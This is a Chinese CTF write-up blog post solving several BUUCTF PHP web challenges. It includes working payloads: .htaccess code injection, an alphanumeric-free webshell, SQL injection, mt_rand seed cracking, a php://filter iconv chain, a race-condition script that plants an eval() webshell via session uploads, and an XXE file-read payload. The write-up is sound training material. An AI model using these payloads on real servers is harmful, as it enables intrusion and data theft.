BUUCTF刷题(2)

[羊城杯2020]easyphp

打开就是源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 <?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

代码审计

  1. 使用 scandir('./') 函数获取当前目录中的文件和文件夹列表。
  2. 使用 foreach 循环遍历目录中的每个文件。
  3. 对于每个文件,首先检查它是否是一个文件(而不是文件夹),然后检查它是否不是 “index.php” 文件。
  4. 如果满足上述条件,则使用 unlink($file) 函数删除该文件。
  5. 接下来,检查是否存在名为 “content” 和 “filename” 的 GET 请求参数。
  6. 如果其中任何一个参数未设置,则使用 highlight_file(__FILE__) 函数将当前文件的源代码高亮显示,并终止脚本的执行。
  7. 获取名为 “content” 和 “filename” 的 GET 请求参数的值。
  8. 检查 “content” 参数的值是否包含 “on”、”html”、”type”、”flag”、”upload” 或 “file” 字符串,以及是否忽略大小写。如果满足条件,则输出 “Hacker” 并终止脚本的执行。
  9. 检查 “filename” 参数的值是否只包含小写字母和点号。如果不满足条件,则输出 “Hacker” 并终止脚本的执行。
  10. 再次使用 scandir('./') 函数获取当前目录中的文件和文件夹列表。
  11. 使用 foreach 循环遍历目录中的每个文件。
  12. 对于每个文件,首先检查它是否是一个文件(而不是文件夹),然后检查它是否不是 “index.php” 文件。
  13. 如果满足上述条件,则使用 unlink($file) 函数删除该文件。
  14. 最后,使用 file_put_contents($filename, $content . "\nHello, world") 函数将指定的内容写入指定的文件,并附加一个新行。

总体上,这段代码首先删除除 “index.php” 以外的所有文件,然后根据接收的GET请求参数,将内容写入指定的文件中。在处理请求参数时,它进行了一些简单的安全检查,例如防止恶意内容的注入。如果请求参数不符合预期的条件,脚本将输出 “Hacker” 并终止执行。否则,它将将内容写入指定的文件并附加一个新行。

那么,我们只能在index.php上做文章咯,只能是.htaccess配置文件了。

.htaccess

什么是.htaccess?

.htaccess(超文本访问)是许多Web服务器根据目录应用设置的有用文件,允许在运行时覆盖Apache服务器的默认配置。使用.htaccess,我们可以在运行时轻松启用或禁用任何功能。

需要确保服务器已启用 AllowOverride 来允许 .htaccess 文件的使用。

一些语法

一些常见的 .htaccess 语法和规则:

注释:使用 # 符号来添加注释,注释内容将被忽略。

1
# 这是一个注释

指定 .htaccess 的作用范围:使用 DirectoryFiles 指令来指定 .htaccess 文件的作用范围。

1
2
3
4
5
6
7
<Directory /path/to/directory>
    # 在此处指定的规则仅适用于该目录及其子目录
</Directory>

<Files "file.txt">
    # 在此处指定的规则仅适用于指定的文件
</Files>

启用或禁用模块:使用 LoadModuleAddModule 指令来启用或禁用 Apache 模块。

1
2
LoadModule rewrite_module modules/mod_rewrite.so   # 启用 mod_rewrite 模块
AddModule mod_rewrite.c   # 启用 mod_rewrite 模块(旧版本的语法)

URL 重写:使用 RewriteRule 指令实现 URL 重写和重定向。

1
2
3
4
5
6
7
RewriteEngine On   # 启用重写引擎

RewriteRule ^old-page$ new-page [R=301,L]
# 将 /old-page 重定向到 /new-page,并返回 301 永久重定向

RewriteRule ^products/([0-9]+)/?$ product.php?id=$1 [QSA,L]
# 将 /products/123 转发到 /product.php?id=123

禁止访问:使用 DenyRequire 指令来限制对某些目录或文件的访问。

1
2
3
4
5
Deny from all
# 禁止对当前目录及其子目录的访问

Require all denied
# 禁止对当前目录及其子目录的访问(Apache 2.4+)

MIME 类型设置:使用 AddTypeForceType 指令来设置 MIME 类型。

1
2
3
4
5
AddType text/html .html
# 将 .html 文件的 MIME 类型设置为 text/html

ForceType application/octet-stream
# 强制将文件的 MIME 类型设置为 application/octet-stream

一些利用方法

.htaccess利用方式

回到本题

结合上面的内容

使用代码执行

1
2
php_value auto_append_file .htaccess
#<?php phpinfo();

但是有过滤把file拆分,并且将"\nHello, world"\n转义

1
2
3
php_value auto_prepend_fil\
e .htaccess
#<?php system('cat /f???');?>\

[极客大挑战 2020]Roamphp1-Welcome

进入环境,ok,405

换post试一试

一眼hash

估计是签到……

[b01lers2020]Life on Mars

进去发现没什么东西

抓个包,发现有点东西

看起来是查询语句,那么……

sql启动!

/query?search=amazonis_planitia union select version(),database()

成功注入了,接下来就是一把梭。

[SUCTF 2018]GetShell

无字母数字马

<?=system($_POST[_]);

1
<?=$_=[];$__=$_.$_;$_=($_==$__);$__=($_==$_);$___=~区[$__].~冈[$__].~区[$__].~勺[$__].~皮[$__].~针[$__];$____=~码[$__].~寸[$__].~小[$__].~欠[$__].~立[$__];$___($$____[_]);

详细可以看

p神的文章:一些不包含数字和字母的webshell

[MRCTF2020]Ezaudit

进入之后有www.zip泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
<?php 
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') ||($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
}
    else if($Private_key != '*************' )
    {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    }

    else{
        if($Private_key === '************'){
        $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
        $link=mysql_connect("localhost","root","root");
        mysql_select_db("test",$link);
        $result = mysql_query($getuser);
        while($row=mysql_fetch_assoc($result)){
            echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
        }
    }
    }

} 
// genarate public_key 
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
  }

  //genarate private_key
  function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
  }
  $Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

mt_rand()伪随机,直接开爆。

先搓一个脚本,转化字符串。

1
2
3
4
5
6
7
8
9
10
11
12
<?php
$strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$public_key = 'KVQP0LdJKRaV3n9D';
$possible_indexes = [];
for ($j = 0; $j < strlen($public_key); $j++){
    for ($i = 0; $i < strlen($strings1); $i++) {
        if(substr($strings1,$i,1) == substr($public_key,$j,1)){
            echo $i." ".$i." "."0"." ".(strlen($strings1)-1)." ";
        }
    }   
}
?>

直接开爆。

写脚本测试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?
mt_srand(1775196155);
function public_key($length = 16) {
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}

  //genarate private_key
function private_key($length = 12) {
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ( $i = 0; $i < $length; $i++ )
    $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
echo public_key()."</br>";
echo private_key();
?>

得到想要的东西了

然后分析剩下的东西。

1
2
3
4
5
6
7
8
9
if($Private_key === '************'){
    $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'".';'; 
    $link=mysql_connect("localhost","root","root");
    mysql_select_db("test",$link);
    $result = mysql_query($getuser);
    while($row=mysql_fetch_assoc($result)){
        echo "<tr><td>".$row["username"]."</td><td>".$row["flag"]."</td><td>";
    }
}

万能密码直接注,注意闭合 1' or '1' = '1

结束。

[WMCTF2020]Make PHP Great Again

打开得到

1
2
3
4
5
6
<?php
highlight_file(__FILE__);
require_once 'flag.php';
if(isset($_GET['file'])) {
  require_once $_GET['file'];
}

require_once 函数:和 require 语句完全相同,唯一区别是 PHP 会检查该文件是否已经被包含过,如果是则不会再次包含

看到这个,就知道,常规php伪协议是行不通的。

解法一:filter-chain命令注入(<?php var_dump(get_defined_vars()); ?>)

1
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

解法二:require_once包含的软链接层数较多时once的hash匹配会直接失效造成重复包含

php源码分析 require_once 绕过不能重复包含文件的限制

1
php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

解法三:session文件包含

老(偷来)的脚本,直接梭哈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
import requests
import io
import threading

url = ''
sessionid = 'truthahn'
cookies = {
            'PHPSESSID':sessionid
        }

def write(session):
    fileBytes = io.BytesIO(b'a'*1024*50)
    data2 = {
        'PHP_SESSION_UPLOAD_PROGRESS':'<?=eval($_POST[1])?>'
    }
    files = {
        'file':('truthahn.jpg',fileBytes)
    }
    while True:    
        res = session.post(url,data=data2,cookies=cookies,files=files)

def read(session):
    data1 = {
        "1":"file_put_contents('/var/www/html/3.php','<?=eval($_POST[2]);?>');"
    }
    while True:
        res = session.post(url+'?file=/tmp/sess_'+sessionid,data=data1,cookies=cookies)
        res2 = session.get(url+'3.php')
        if res2.status_code == 200:
            print('++++++++ Done! +++++++++')
        else:
            print(res2.status_code)

if __name__ == '__main__':

    event = threading.Event()       
    with requests.session() as session:
        for i in range(5):
            #print('*'*50)
            threading.Thread(target=write,args=(session,)).start()
        for i in range(5):
            #print('='*50)
            threading.Thread(target=read,args=(session,)).start()

    event.set()

[CSAWQual 2019]Web_Unagi

xxe外部实体注入

还有

下面是XML的基本语法规则:

  1. 元素(Element):XML文档由一个或多个元素组成。每个元素由开始标签和结束标签包围,并且可以包含内容、属性和子元素。例如:<element>content</element>
  2. 标签(Tag):开始标签和结束标签用于定义一个元素。开始标签以<开头,结束标签以</开头,后跟元素名称,以>>和空格结尾。例如:<element></element>
  3. 属性(Attribute):元素可以拥有零个或多个属性。属性提供有关元素的额外信息,以键值对的形式表示。属性位于开始标签中,并由空格分隔。例如:<element attribute="value">content</element>
  4. 内容(Content):元素可以包含文本内容或其他子元素。内容位于开始标签和结束标签之间。例如:<element>content</element>
  5. 注释(Comment):注释用于在XML文档中添加注释信息,不会被解析器处理。注释以<!--开头,以-->结尾。例如:<!-- This is a comment -->
  6. 实体引用(Entity Reference):某些特殊字符(如小于号 < 和大于号 >)在XML中有特殊含义。为了在文本中表示这些字符,可以使用实体引用。例如:< 表示 <> 表示 >
  7. CDATA节(CDATA Section):CDATA节用于包含需要保留原始格式的文本,不会被解析器解析。CDATA节以<![CDATA[开头,以]]>结尾。例如:<![CDATA[This is some <b>bold</b> text.]]>

这些是XML的基本语法规则,用于定义结构化数据和信息。XML可以用于表示各种数据,例如配置文件、数据传输、Web服务等。

有payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY xxe SYSTEM "file:///flag" >]>
<users>
    <user>
        <username>gg</username>
        <password>passwd1</password>
        <name>ggg</name>
        <email>alice@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
    <user>
        <username>bob</username>
        <password>passwd2</password>
        <name> Bob</name>
        <email>bob@fakesite.com</email>  
        <group>CSAW2019</group>
        <intro>&xxe;</intro>
    </user>
</users>

绕过WAF保护的XXE